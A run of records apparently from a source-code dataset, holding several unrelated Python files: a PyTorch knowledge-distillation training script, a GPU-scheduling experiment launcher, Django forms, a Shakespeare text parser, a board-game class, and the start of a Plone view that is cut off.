A.argparse_create(ap.parse_args(['--thing', '2', '--thing', '3']).__dict__)\n assert args.config.thing == [2, 3]\n\n","sub_path":"test/test_pyobjconfig.py","file_name":"test_pyobjconfig.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"411718798","text":"import os\nimport argparse\nfrom typing import Dict, Any\nimport copy\nimport logging\n\nimport yaml\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.optim import Optimizer\nfrom torch.utils.data import DataLoader\nfrom torch.nn import Module, CrossEntropyLoss, ModuleDict\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom dataset import get_dataset\n# from models import get_model\nfrom optim import get_optimizer\n\nfrom models import get_model\nfrom distiller_zoo import get_loss_module, get_loss_forward\n\nfrom helper.util import str2bool, get_logger, preserve_memory, adjust_learning_rate_stage2\nfrom helper.util import make_deterministic\nfrom helper.util import AverageMeter, accuracy\nfrom helper.validate import validate_LTB, validate\n\nfrom LEARNTOBRANCH import LEARNTOBRANCH_Deep\n\n\ndef get_dataloader(cfg: Dict[str, Any]):\n # dataset\n dataset_cfg = cfg[\"dataset\"]\n train_dataset = get_dataset(split=\"train\", **dataset_cfg)\n val_dataset = get_dataset(split=\"val\", **dataset_cfg)\n num_classes = len(train_dataset.classes)\n\n train_loader = DataLoader(\n dataset=train_dataset,\n batch_size=cfg[\"training\"][\"batch_size\"],\n num_workers=cfg[\"training\"][\"num_workers\"],\n shuffle=True,\n pin_memory=True\n )\n val_loader = DataLoader(\n dataset=val_dataset,\n batch_size=cfg[\"validation\"][\"batch_size\"],\n num_workers=cfg[\"validation\"][\"num_workers\"],\n shuffle=False,\n pin_memory=True\n )\n\n return train_loader, val_loader, num_classes\n\n\ndef train_epoch(\n cfg: Dict[str, Any],\n epoch: int,\n train_loader: DataLoader,\n module_dict: ModuleDict,\n criterion_dict: ModuleDict,\n optimizer: Optimizer,\n tb_writer: SummaryWriter,\n device: torch.device\n):\n logger = logging.getLogger(\"train_epoch\")\n # logger.info(\"Start training one epoch...\")\n\n gamma = cfg[\"kd\"][\"loss_weights\"][\"classify_weight\"]\n alpha = cfg[\"kd\"][\"loss_weights\"][\"kd_weight\"]\n beta = cfg[\"kd\"][\"loss_weights\"][\"other_loss_weight\"]\n logger.info(\n \"Starting train one epoch with [gamma: %.5f, alpha: %.5f, beta: %.5f]...\",\n gamma, alpha, beta\n )\n\n for name, module in module_dict.items():\n if name == \"teacher\":\n module.eval()\n else:\n module.train()\n\n criterion_cls = criterion_dict[\"cls\"]\n criterion_div = criterion_dict[\"div\"]\n criterion_kd = criterion_dict[\"kd\"]\n\n model_s = module_dict[\"student\"]\n model_t = module_dict[\"teacher\"]\n\n # if loss_method == 'nce':\n if cfg[\"model\"][\"task\"] == 'mt':\n losses = [AverageMeter() for _ in range(cfg[\"dataset\"][\"num_classes\"])]\n top1 = [AverageMeter() for _ in range(cfg[\"dataset\"][\"num_classes\"])]\n top5 = [AverageMeter() for _ in range(cfg[\"dataset\"][\"num_classes\"])]\n\n # elif loss_method =='ce':\n elif cfg[\"model\"][\"task\"] == 'mc':\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n for idx, (x, target) in enumerate(train_loader):\n __global_values__[\"it\"] += 1\n\n x = x.to(device)\n target = target.to(device)\n\n # ===================forward=====================\n # logger.info(x.shape)\n preact = False\n if cfg[\"kd_loss\"][\"name\"] == \"ABLoss\":\n preact = True\n\n # logit = model(x, int(cfg[\"training\"][\"t\"])/(epoch), False)\n\n logit_s = model_s(x, int(cfg[\"training\"][\"t\"])/(epoch), False)\n\n with torch.no_grad():\n logit_t = model_t(x, is_feat=False, preact=preact)\n \n feat_s = None\n feat_t = None \n\n if cfg[\"model\"][\"task\"] == 'mc':\n # print(logit.shape, target.shape)\n # return 0\n # cls + kl div\n loss_cls = criterion_cls(logit_s, target.squeeze())\n loss_div = criterion_div(logit_s, logit_t)\n\n loss_kd = get_loss_forward(\n cfg=cfg,\n feat_s=feat_s,\n feat_t=feat_t,\n logit_s=logit_s,\n logit_t=logit_t,\n target=target,\n criterion_kd=criterion_kd,\n module_dict=module_dict\n )\n\n loss = gamma * loss_cls + alpha * loss_div + beta * loss_kd\n acc1, acc5 = accuracy(logit_s, target.squeeze(), topk=(1, 5))\n losses.update(loss.item(), x.shape[0])\n top1.update(acc1[0], x.shape[0])\n top5.update(acc5[0], x.shape[0])\n\n # loss = criterion(logit, target.squeeze())\n # acc1, acc5 = accuracy(logit, target.squeeze(), topk=(1, 5))\n # losses.update(loss.item(), x.shape[0])\n # top1.update(acc1[0], x.shape[0])\n # top5.update(acc5[0], x.shape[0])\n loss_avg = losses.avg\n top1_avg = top1.avg\n top5_avg = top5.avg\n # elif loss_method == 'nce':\n elif cfg[\"model\"][\"task\"] == 'mt':\n\n loss = []\n acc1, acc5 = [], []\n print(len(logit), logit[0].shape, logit[1].shape)\n print(target.shape)\n return 0\n for j in range(len(logit)):\n print(logit[j].shape)\n print(logit)\n\n return 0\n\n loss.append(criterion(logit[j], target[:, j]))\n acc1.append(accuracy(logit[j], target[:, j], topk=(1, 1))[0])\n acc5.append(accuracy(logit[j], target[:, j], topk=(1, 1))[1])\n\n losses[j].update(loss[j].item(), x.shape[0])\n top1[j].update(acc1[j], x.shape[0])\n top5[j].update(acc5[j], x.shape[0])\n\n losses_avg = [losses[k].avg for k in range(len(losses))]\n top1_avg = [top1[k].avg for k in range(len(top1))]\n top5_avg = [top5[k].avg for k in range(len(top5))]\n\n loss_avg = sum(losses_avg) / len(losses_avg)\n top1_avg = sum(top1_avg) / len(top1_avg)\n top5_avg = sum(top5_avg) / len(top5_avg)\n\n loss = sum(loss)\n # ===================backward=====================\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # print info\n tb_writer.add_scalars(\n main_tag=\"train/acc\",\n tag_scalar_dict={\n \"@1\": top1_avg,\n \"@5\": top5_avg,\n },\n global_step=__global_values__[\"it\"]\n )\n tb_writer.add_scalars(\n main_tag=\"train/loss\",\n tag_scalar_dict={\n \"cls\": loss_cls.item(),\n \"div\": loss_div.item(),\n \"kd\": loss_kd.item()\n },\n global_step=__global_values__[\"it\"]\n )\n if idx % cfg[\"training\"][\"print_iter_freq\"] == 0:\n logger.info(\n \"Epoch: %3d|%3d, idx: %d, total iter: %d, loss: %.5f, acc@1: %.4f, acc@5: %.4f\",\n epoch, cfg[\"training\"][\"epochs\"],\n idx, __global_values__[\"it\"],\n loss_avg, top1_avg, top5_avg\n )\n\n # return top1.avg, losses.avg\n return top1_avg, loss_avg\n\n\ndef train_kd(\n cfg: Dict[str, Any],\n train_loader: DataLoader,\n val_loader: DataLoader,\n module_dict: ModuleDict,\n criterion_dict: ModuleDict,\n optimizer: Optimizer,\n lr_scheduler: MultiStepLR,\n tb_writer: SummaryWriter,\n device: torch.device,\n ckpt_dir: str\n):\n logger = logging.getLogger(\"train\")\n logger.info(\"Start training...\")\n\n # validate teacher accuracy\n teacher_acc, _, _ = validate(\n val_loader=val_loader,\n model=module_dict[\"teacher\"],\n criterion=criterion_dict[\"cls\"],\n device=device\n )\n logger.info(\"Teacher accuracy: %.4f\", teacher_acc)\n\n best_acc = 0\n for epoch in range(1, cfg[\"training\"][\"epochs\"] + 1):\n global_lr = adjust_learning_rate_stage2(\n optimizer=optimizer,\n epoch_current=epoch\n )\n\n logger.info(\"Start training epoch: %d, current lr: %.6f\", \n epoch, lr_scheduler.get_last_lr()[0])\n\n train_acc, train_loss = train_epoch(\n cfg=cfg,\n epoch=epoch,\n train_loader=train_loader,\n module_dict=module_dict,\n criterion_dict=criterion_dict,\n optimizer=optimizer,\n tb_writer=tb_writer,\n device=device\n )\n\n tb_writer.add_scalar(\"epoch/train_acc\", train_acc, epoch)\n tb_writer.add_scalar(\"epoch/train_loss\", train_loss, epoch)\n\n val_acc, val_acc_top5, val_loss = validate_LTB(\n cfg=cfg,\n val_loader=val_loader,\n model=module_dict[\"student\"],\n criterion=criterion_dict[\"cls\"],\n device=device,\n num_classes=cfg[\"dataset\"][\"num_classes\"],\n t=cfg[\"training\"][\"t\"],\n epoch=epoch,\n loss_method=cfg[\"model\"][\"loss_method\"],\n stage='s2'\n )\n\n tb_writer.add_scalar(\"epoch/val_acc\", val_acc, epoch)\n tb_writer.add_scalar(\"epoch/val_loss\", val_loss, epoch)\n tb_writer.add_scalar(\"epoch/val_acc_top5\", val_acc_top5, epoch)\n\n logger.info(\n \"Epoch: %04d | %04d, acc: %.4f, loss: %.5f, val_acc: %.4f, val_acc_top5: %.4f, val_loss: %.5f\",\n epoch, cfg[\"training\"][\"epochs\"],\n train_acc, train_loss,\n val_acc, val_acc_top5, val_loss\n )\n\n lr_scheduler.step()\n\n state = {\n \"epoch\": epoch,\n \"model\": module_dict[\"student\"].state_dict(),\n \"acc\": val_acc,\n \"optimizer\": optimizer.state_dict(),\n \"lr_scheduler\": lr_scheduler.state_dict()\n }\n\n # regular saving\n if epoch % cfg[\"training\"][\"save_ep_freq\"] == 0:\n print(epoch, cfg[\"training\"][\"save_ep_freq\"])\n logger.info(\"Saving epoch %d checkpoint...\", epoch)\n\n save_file = os.path.join(ckpt_dir, \"epoch_{}.pth\".format(epoch))\n torch.save(state, save_file)\n\n # save the best model\n if val_acc > best_acc:\n best_acc = val_acc\n best_ep = epoch\n\n save_file = os.path.join(ckpt_dir, \"best.pth\")\n logger.info(\"Saving the best model with acc: %.4f\", best_acc)\n torch.save(state, save_file)\n logger.info(\"Epoch: %04d | %04d, best acc: %.4f,\", epoch, cfg[\"training\"][\"epochs\"], best_acc)\n\n logger.info(\"Final best accuracy: %.5f, at epoch: %d\", best_acc, best_ep)\n\n\ndef get_teacher(cfg: Dict[str, Any], num_classes: int) -> Module:\n teacher_cfg = copy.deepcopy(cfg[\"kd\"][\"teacher\"])\n teacher_name = teacher_cfg[\"name\"]\n ckpt_fp = teacher_cfg[\"checkpoint\"]\n teacher_cfg.pop(\"name\")\n teacher_cfg.pop(\"checkpoint\")\n\n # load state dict\n state_dict = torch.load(ckpt_fp, map_location=\"cpu\")[\"model\"]\n\n model_t = get_model(\n model_name=teacher_name,\n num_classes=num_classes,\n state_dict=state_dict,\n **teacher_cfg\n )\n return model_t\n\n\ndef main(\n cfg_filepath: str,\n file_name_cfg: str,\n logdir: str,\n gpu_preserve: bool = False,\n debug: bool = False\n):\n with open(cfg_filepath) as fp:\n cfg = yaml.load(fp, Loader=yaml.SafeLoader)\n\n if debug:\n cfg[\"training\"][\"num_workers\"] = 0\n cfg[\"validation\"][\"num_workers\"] = 0\n\n seed = cfg[\"training\"][\"seed\"]\n\n ckpt_dir = os.path.join(logdir, \"ckpt\")\n os.makedirs(logdir, exist_ok=True)\n os.makedirs(ckpt_dir, exist_ok=True)\n\n formatter = (\n cfg[\"kd\"][\"teacher\"][\"name\"],\n cfg[\"kd\"][\"student\"][\"name\"],\n cfg[\"kd_loss\"][\"name\"],\n cfg[\"dataset\"][\"name\"],\n )\n\n writer = SummaryWriter(\n log_dir=os.path.join(\n logdir,\n \"tf-logs\",\n file_name_cfg.format(*formatter)\n ),\n flush_secs=1\n )\n\n train_log_dir = os.path.join(logdir, \"train-logs\")\n os.makedirs(train_log_dir, exist_ok=True)\n logger = get_logger(\n level=logging.INFO,\n mode=\"w\",\n name=None,\n logger_fp=os.path.join(\n train_log_dir,\n \"training-\" + file_name_cfg.format(*formatter) + \".log\"\n )\n )\n logger.info(\"Start running with config: \\n{}\".format(yaml.dump(cfg)))\n\n # set seed\n make_deterministic(seed)\n logger.info(\"Set seed : {}\".format(seed))\n\n if gpu_preserve:\n logger.info(\"Preserving memory...\")\n preserve_memory(args.preserve_percent)\n logger.info(\"Preserving memory done\")\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # get dataloaders\n logger.info(\"Loading datasets...\")\n train_loader, val_loader, num_classes = get_dataloader(cfg)\n\n logger.info(\"num_classes: {}\".format(num_classes))\n\n # get models\n logger.info(\"Loading teacher {} and student {}...\".format(\n cfg[\"kd\"][\"teacher\"][\"name\"],cfg[\"kd\"][\"student\"][\"name\"]))\n model_t = get_teacher(cfg, num_classes).to(device)\n # model_s = get_student(cfg, num_classes).to(device)\n model_t.eval()\n # model_s.eval()\n\n model_s = LEARNTOBRANCH_Deep(\n dataset=cfg[\"dataset\"][\"name\"], \n num_attributes=cfg[\"dataset\"][\"num_classes\"],\n loss_method= cfg[\"model\"][\"loss_method\"]).to(device)\n\n branch_params_list = list(map(id, model_s.branch_2.parameters())) + list(map(id, model_s.branch_3.parameters())) + \\\n list(map(id, model_s.branch_4.parameters()))\n\n global_params = filter(lambda p: id(p) not in branch_params_list, model_s.parameters())\n branch_params = filter(lambda p: id(p) in branch_params_list, model_s.parameters())\n\n # params = [\n # {\"params\": global_params, \"lr\": cfg[\"training\"][\"lr_global\"]},\n # {\"params\": branch_params, \"lr\": cfg[\"training\"][\"lr_branch\"]},\n # ]\n\n model_s.eval()\n\n logger.info(model_s)\n\n module_dict = nn.ModuleDict(dict(\n student=model_s,\n teacher=model_t\n ))\n trainable_dict = nn.ModuleDict(dict(student=model_s))\n\n # get loss modules\n criterion_dict, loss_trainable_dict = get_loss_module(\n cfg=cfg,\n module_dict=module_dict,\n train_loader=train_loader,\n tb_writer=writer,\n device=device\n )\n trainable_dict.update(loss_trainable_dict)\n\n assert \"teacher\" not in trainable_dict.keys(), \"teacher is not trainable\"\n\n # model_s = model_s.to(device)\n # criterion = criterion.to(device)\n\n # optimizer\n # optimizer = get_optimizer(trainable_dict.parameters(), cfg[\"training\"][\"optimizer\"])\n # lr_scheduler = MultiStepLR(\n # optimizer=optimizer,\n # milestones=cfg[\"training\"][\"lr_decay_epochs\"],\n # gamma=cfg[\"training\"][\"lr_decay_rate\"]\n # )\n\n # optimizer\n # optimizer = torch.optim.Adam(params,\n # weight_decay=float(cfg[\"training\"][\"optimizer\"][\"weight_decay\"]))\n optimizer = torch.optim.SGD(\n params=global_params,\n lr=cfg[\"training\"][\"lr_stage2\"],\n weight_decay=cfg[\"training\"][\"optimizer\"][\"weight_decay_stage2\"],\n momentum=cfg[\"training\"][\"optimizer\"][\"momentum\"])\n\n checkpoint = torch.load(cfg[\"model\"][\"pretrained\"])\n # print(checkpoint.keys())\n model_s.load_state_dict(checkpoint['model'])\n logger.info(\"=> loaded checkpoint '{}'\".format(cfg[\"model\"][\"pretrained\"]))\n model_s._initialize_weights()\n\n lr_scheduler = MultiStepLR(\n optimizer=optimizer,\n milestones=cfg[\"training\"][\"lr_decay_epochs\"],\n gamma=cfg[\"training\"][\"lr_decay_rate\"]\n )\n\n logger.info(optimizer)\n\n # append teacher after optimizer to avoid weight_decay\n module_dict[\"teacher\"] = model_t.to(device)\n\n train_kd(\n cfg=cfg,\n train_loader=train_loader,\n val_loader=val_loader,\n module_dict=module_dict,\n criterion_dict=criterion_dict,\n optimizer=optimizer,\n lr_scheduler=lr_scheduler,\n tb_writer=writer,\n device=device,\n ckpt_dir=ckpt_dir\n )\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, default = '/home/yxy/kaecode3/LTB_kd/configs/cifar-10/seed-1029/kd/ResNet50-LTB-ce.yml')\n parser.add_argument(\"--logdir\", type=str, default = '/home/yxy/kaecode3/LTB_kd/log_LTB_kd_s2')\n parser.add_argument(\"--file_name_cfg\", type=str,default = 'ResNet50-LTB-ce.yml')\n parser.add_argument(\"--stage\", type=str,default = 's2')\n parser.add_argument(\"--gpu_preserve\", type=str2bool, default=False)\n parser.add_argument(\"--debug\", type=str2bool, default=False)\n parser.add_argument(\"--preserve_percent\", type=float, default=0.95)\n args = parser.parse_args()\n\n __global_values__ = dict(it=0)\n main(\n cfg_filepath=args.config,\n file_name_cfg=args.file_name_cfg,\n logdir=args.logdir,\n gpu_preserve=args.gpu_preserve,\n debug=args.debug\n )\n","sub_path":"train_LTB_kd_s2.py","file_name":"train_LTB_kd_s2.py","file_ext":"py","file_size_in_byte":16943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"170698862","text":"from plumbum import local\nfrom plumbum.cmd import sed, awk, git\nimport time\nimport socket\n\n\ndef inspect_gpus(memory_threshold=500,\n gpu_util_threshold=5,\n allow_lightly_used_gpus=False,\n share_with=tuple(),\n max_nr_processes=2,\n upper_memory_threshold=3000,\n upper_gpu_util_threshold=30,\n average=1):\n \"\"\"\n Scan servers for free GPUs, print availability and return a list of free GPUs that can used to\n start jobs on them.\n Requirements:\n ~/.ssh/config needs to be set up so that connecting via `ssh ` works. Fos OSX,\n an entry can look like this:\n Host mulga\n User maxigl\n HostName mulga.cs.ox.ac.uk\n BatchMode yes\n ForwardAgent yes\n StrictHostKeyChecking no\n AddKeysToAgent yes\n UseKeychain yes\n IdentityFile ~/.ssh/id_rsa\n Args:\n verbose (bool): If True, also print who is using the GPUs\n memory_threshold (int):\n gpu_util_threshold (int): When used memory < memory_threshold and\n GPU utilisation < gpu_util_threshold,\n then the GPU is regarded as free.\n allow_lightly_used_gpus (bool):\n share_with (tuple of strings):\n upper_memory_threshold (int):\n upper_gpu_util_threshold (int): If `allow_lightly_used_gpus=True` and memory and gpu\n utilisation are under the upper thresholds and there\n is so far only one process executed on that GPU who's\n user is in in the list `share_with`, then the GPU will\n be added to the list of GPUs that can be used to start jobs.\n Return:\n free_gpus: List of dictionaries, each containing the following keys:\n 'gpu_nr': Number of the free GPU\n 'double': Whether someone is already using that GPU but it's still considered\n usuable (see `allow_lightly_used_gpus`)\n \"\"\"\n\n r_smi = local[\"nvidia_smi\"]\n r_ps = local[\"ps\"]\n averaged_gpu_data = []\n for avg_idx in range(average):\n fieldnames = ['index', 'gpu_uuid', 'memory.total', 'memory.used',\n 'utilization.gpu', 'gpu_name']\n output = r_smi(\"--query-gpu=\" + \",\".join(fieldnames),\n \"--format=csv,noheader,nounits\").replace(\" \", \"\")\n\n gpu_data = []\n for line in output.splitlines():\n gpu_data.append(dict([(name, int(x)) if x.strip().isdigit() else (name, x)\n for x, name in zip(line.split(\",\"), fieldnames)]))\n if avg_idx == 0:\n averaged_gpu_data = gpu_data\n for gpu_idx in range(len(averaged_gpu_data)):\n averaged_gpu_data[gpu_idx]['utilization.gpu'] /= average\n averaged_gpu_data[gpu_idx]['memory.used'] /= average\n else:\n for gpu_idx, data in enumerate(gpu_data):\n averaged_gpu_data[gpu_idx]['utilization.gpu'] += data['utilization.gpu'] / average\n averaged_gpu_data[gpu_idx]['memory.used'] += data['memory.used'] / average\n time.sleep(1.)\n\n gpu_data = averaged_gpu_data\n\n # Find processes and users\n for data in gpu_data:\n data['nr_processes'] = 0\n data['users'] = []\n\n output = r_smi(\"--query-compute-apps=pid,gpu_uuid\",\n \"--format=csv,noheader,nounits\").replace(\" \", \"\")\n\n gpu_processes = []\n for line in output.splitlines():\n gpu_processes.append([int(x) if x.strip().isdigit() else x for x in line.split(\",\")])\n\n for process in gpu_processes:\n pid = process[0]\n user = (r_ps['-u', '-p'] | sed['-n', '2p'] | awk['{{print $1}}'])(pid)\n serial = process[1]\n for data in gpu_data:\n if data['gpu_uuid'] == serial:\n data['users'].append(user.strip())\n data['nr_processes'] += 1\n\n free_gpus = []\n\n for data in gpu_data:\n # Is it free?\n if (data['memory.used'] < memory_threshold and\n data['utilization.gpu'] < gpu_util_threshold):\n\n free_gpus.append({'gpu_nr': data['index'],\n 'occupation': 0})\n # 'session': getSession(data['index'])})\n elif (allow_lightly_used_gpus and\n data['memory.used'] < upper_memory_threshold and\n data['utilization.gpu'] < upper_gpu_util_threshold and\n data['nr_processes'] < max_nr_processes and\n data['users'][0] in share_with):\n\n free_gpus.append({'gpu_nr': data['index'],\n 'occupation': data['nr_processes']})\n\n return free_gpus\n\n\ndatasets_dims = {\n 'mnist': 28 * 28,\n 'fashion-mnist': 28 * 28,\n 'miniboone': 43,\n 'gas': 8,\n 'power': 6,\n 'hepmass': 21,\n 'bsds300': 21,\n}\n\nimport subprocess\nimport os\nimport torch\nimport itertools\n\ngpus_list = list(range(8))\nnum_gpus = len(gpus_list)\n\nfilename = 'main.py'\n\n\ndef execute_process(params, gpuid, host):\n env = os.environ.copy()\n env['CUDA_VISIBLE_DEVICES'] = str(gpuid)\n dataset, model, lr, num_flow_layers, num_ortho_vecs, num_householder, lr_schedule, experiment_name = params\n command = []\n if host == 'zizgpu04.cpu.stats.ox.ac.uk':\n command += ['taskset', '-c', '0-20', '<']\n command += ['python', filename,\n '--dataset', dataset,\n '--model', model,\n '--config', f'num_flow_layers={num_flow_layers}',\n '--config', f'num_ortho_vecs={int(num_ortho_vecs * datasets_dims[dataset])}',\n '--config', f'num_householder={int(num_householder * datasets_dims[dataset])}',\n '--config', f'lr={lr}',\n '--config', f'lr_schedule={lr_schedule}',\n '--config', f'experiment_name={experiment_name}',\n ]\n command = list(map(str, command))\n print(f\"CUDA_VISIBLE_DEVICES={str(gpuid)} {' '.join(command)}\")\n subprocess.Popen(command, env=env)\n # return\n\n\nparams_list = []\n\ndatasets = [\n # 'mnist',\n 'miniboone',\n # 'gas',\n # 'power',\n]\nmodels = [\n \"sylvester-orthogonal\",\n \"sylvester-householder\",\n \"sylvester-triangular\",\n \"sylvester-exponential\",\n \"sylvester-cayley\"\n]\nlrs = [5e-4]\n\nnum_flow_layers = [64, 128]\n\n# multiplier for the number of dimensions of the dataset\nnum_ortho_vecs = [1.]\nnum_householder = [1.]\n\nlr_schedule = ['plateau']\n\nexperiment_name = ['11_06_2']\n\nvariables_sweeped = [datasets, models, lrs[::-1], num_flow_layers, num_ortho_vecs, num_householder, lr_schedule,\n experiment_name]\n\ntries = 3\nparams_list += list(itertools.product(*variables_sweeped)) * tries\n\n# lrs = [5e-3, 2e-3, 8e-4, 5e-4, 2e-4, 8e-5, 5e-5]\n\nprint(params_list)\n\nhost = socket.gethostname()\n\nmemory_thresholds = {\n 'zizgpu01.cpu.stats.ox.ac.uk': 3000,\n 'zizgpu02.cpu.stats.ox.ac.uk': 3000,\n 'zizgpu03.cpu.stats.ox.ac.uk': 3000,\n 'zizgpu04.cpu.stats.ox.ac.uk': 3000,\n}\n\nif host == 'zizgpu04.cpu.stats.ox.ac.uk':\n disallowed_gpus = (0, 1, 2)\nelse:\n disallowed_gpus = tuple()\n\nwhile params_list:\n free_gpus = inspect_gpus(\n memory_threshold=memory_thresholds[host],\n gpu_util_threshold=95,\n average=2,\n share_with=('agolinsk',))\n if host == 'zizgpu04.cpu.stats.ox.ac.uk':\n free_gpus = list(filter(lambda x: x['gpu_nr'] not in (5,), free_gpus))\n free_gpus = list(filter(lambda x: x['gpu_nr'] not in disallowed_gpus, free_gpus))\n\n print()\n print(f\"Leftover params: {params_list}\")\n print()\n print(f\"Free gpus: {free_gpus}\")\n print()\n\n if free_gpus:\n params = params_list.pop()\n execute_process(params, free_gpus[0]['gpu_nr'], host)\n time.sleep(30.)\n\n# while params_list:\n# free_gpus = inspect_gpus(average=2)\n# if [i['gpu_nr'] for i in free_gpus if i['gpu_nr'] == 6]:\n# params = params_list.pop()\n# execute_process(params, 6)\n# time.sleep(30.)\n\nprint(\"Done\")\n","sub_path":"batch_training.py","file_name":"batch_training.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65841672","text":"# -*- coding:utf-8 -*-\nfrom django import forms\nfrom fried_chicken.models import Reservation, Set\nfrom django.forms.formsets import BaseFormSet, formset_factory\nfrom fried_chicken.misc import add_empty_choice\n\n\nclass CustomModelFormSet(BaseFormSet):\n def save_new(self, form, commit=True):\n \"\"\"Saves and returns a new model instance for the given form.\"\"\"\n return form.save(commit=commit)\n\n def save_new_objects(self, commit=True):\n self.new_objects = []\n for form in self.extra_forms:\n if not form.has_changed():\n continue\n # If someone has marked an add form for deletion, don't save the\n # object.\n if self.can_delete and self._should_delete_form(form):\n continue\n self.new_objects.append(self.save_new(form, commit=commit))\n if not commit:\n self.saved_forms.append(form)\n return self.new_objects\n\n def save(self, commit=True):\n \"\"\"Saves model instances for every form, adding and changing instances\n as necessary, and returns the list of instances.\n \"\"\"\n if not commit:\n self.saved_forms = []\n\n def save_m2m():\n for form in self.saved_forms:\n form.save_m2m()\n self.save_m2m = save_m2m\n return self.save_new_objects(commit)\n\n\nclass ReservationForm(forms.ModelForm):\n class Meta:\n model = Reservation\n fields = (\n \"name\",\n )\n widgets = {}\n\n def __init__(self, *args, **kwargs):\n super(ReservationForm, self).__init__(*args, **kwargs)\n\n self.fields[\"name\"].widget.attrs.update({'class': \"form-control\"})\n\n def clean(self):\n cleaned_data = super(ReservationForm, self).clean()\n for field in self.fields:\n if not cleaned_data.get(field):\n self._errors[field] = self.error_class([u\"%sを入力してください\" % self.fields[field].label])\n return cleaned_data\n\nclass SetForm(forms.ModelForm):\n sets = forms.TypedChoiceField(label=u\"セット数(4個/1セット)\",\n choices=add_empty_choice(tuple([(i, str(i)) for i in range(1, 5+1)])),\n required=False, coerce=int, empty_value=None)\n\n class Meta:\n model = Set\n fields = (\n \"topping\",\n \"sets\",\n )\n widgets = {}\n\n def __init__(self, *args, **kwargs):\n super(SetForm, self).__init__(*args, **kwargs)\n\n for field in self.fields:\n self.fields[field].widget.attrs.update({'class': \"form-control\"})\n\n def clean(self):\n cleaned_data = super(SetForm, self).clean()\n for field in self.fields:\n if not cleaned_data.get(field):\n self._errors[field] = self.error_class([u\"%sを入力してください\" % self.fields[field].label])\n return cleaned_data\n\nSetFormSet = formset_factory(SetForm, CustomModelFormSet, extra=5, max_num=5)","sub_path":"src/fried_chicken/customer/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"620218119","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 27 10:39:59 2014\n\n@author: ddiggins, koenigin\n\"\"\"\n\nimport re\n\nf = open('Shakespeare.txt')\nfullText = f.read() #Turns the contents of Shakespeare.txt into a readable text file\nf.close\n\n\ndef master_isolator(play, title):\n \"\"\" Does a whole lot of things!\n Inputs: Shakespeare.txt, and the title of the play Alls Well that Ends Well\n \n This function searches for the beginning and ending of the play and returns those. Then it takes the play that results,\n compiles a list of characters from the play's Dramatis Personae (because those are really the only ones that matter),\n and splits the play up in acts so we can track the sentiment of the characters in each act over time using ShakespeareSpeech.py\n \"\"\"\n #Finds the whole text of the play\n titlefinder = play.index(title.upper()) #Traverses works to find play title in text\n play = play[titlefinder:]\n end_of_play = play.index(\"THE END\") #Finds end of play\n playtext = play[:end_of_play] #Isolates the full play text\n \n \n chars_and_acts = [] \n \n \n #Isolates the Dramatis Personae of the Play\n if \"DRAMATIS PERSONAE\" in playtext:\n start_of_personae= playtext.index(\"DRAMATIS PERSONAE\") #Finds beginning of Personae\n elif \"Dramatis Personae\" in playtext:\n start_of_personae= playtext.index(\"Dramatis Personae\")\n end_of_personae = playtext.index(\"<<\") #Project Gutenberg documents end Personae with long copyright notices\n personae = playtext[start_of_personae:end_of_personae] #Isolates\n \n #Uses isolated Personae to compile a character list\n \n characters = {} #Creates empty dictionary for character names\n play = re.findall(\"[\\w'\\.\\!\\?\\-]+\", personae)#Translates dramatis personae into list of words\n for word in play:\n if word == word.upper(): #Names appear in capital letters in Personae\n if word not in characters: #Adds character if they are not yet in the dictionary\n if word != 'THE':\n if word != 'OF':\n if word != 'A': #Getting rid of common extraneous words here\n characters[word + \".\"] = []\n \n chars_and_acts.append(characters)\n \n #Isolates acts and separates them as different values of a list\n \n acts = ['I', 'II', 'III', 'IV', 'V'] #All of the plays compatible with this format have five acts\n for act in range(len(acts)):\n start_of_act = playtext.index(\"ACT \" + acts[act])\n if acts[act] == acts[-1]: #Ends function if act V is reached!\n newact = playtext[start_of_act:]\n chars_and_acts.append(newact)\n else:\n newact = playtext[start_of_act:] #Sets the new act start point\n end_of_act = newact.index(\"< None:\r\n self.descricao = \"\"\r\n self.tipo = \"\"\r\n self.cor_a_destruir = \"\"\r\n self.continentes_a_conquistar = [] # lista de objetos do tipo continente\r\n self.territorios_a_conquistar_qtd = 0\r\n self.tropas_em_cada_territorios = 0\r\n\r\n def __eq__(self, other) -> bool:\r\n return self.descricao == other.descricao\r\n","sub_path":"WAR/jogo/Objetivo.py","file_name":"Objetivo.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"145920492","text":"################################################################\n# pp.client-plone\n# (C) 2013, ZOPYX Limited, D-72074 Tuebingen, Germany\n################################################################\n\nfrom Products.Five.browser import BrowserView\nfrom Products.ATContentTypes.interface.folder import IATFolder\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFCore.WorkflowCore import WorkflowException\n\ntry:\n from plone.dexterity.interfaces import IDexterityContainer\n HAVE_DEXTERITY = True\nexcept ImportError:\n HAVE_DEXTERITY = False\n\nfrom ...logger import LOG\nfrom ...interfaces import IPPContent, IArchiveFolder\n\ndef _c(s):\n if not isinstance(s, unicode):\n s = unicode(s, 'utf-8', 'ignore')\n return s.encode('utf-8')\n\nclass FlatHTMLView(BrowserView):\n \"\"\" A HTML collector for a Plone folder containing Document instances \"\"\"\n\n def collect(self, published_only=False, filter_uids=[]):\n \"\"\" A collector taking only flat contents into account for the\n conversion.\n \"\"\"\n\n def collect_objects(folder, level=0, items=[]):\n \"\"\" Collect all related subobjects \"\"\"\n for brain in folder.getFolderContents({'sort_on' : 